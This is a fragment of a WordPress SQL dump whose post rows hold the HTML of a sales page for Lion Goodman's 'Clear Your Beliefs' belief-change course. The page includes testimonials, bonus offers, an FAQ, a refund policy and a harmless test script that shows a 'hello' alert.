spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() { var is_chrome = window.chrome;  if (is_chrome) {  alert(''hello''); } });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:35:20', '2014-06-18 02:35:20', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1002, 4194, '2014-06-17 21:37:14', '2014-06-18 02:37:14', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: 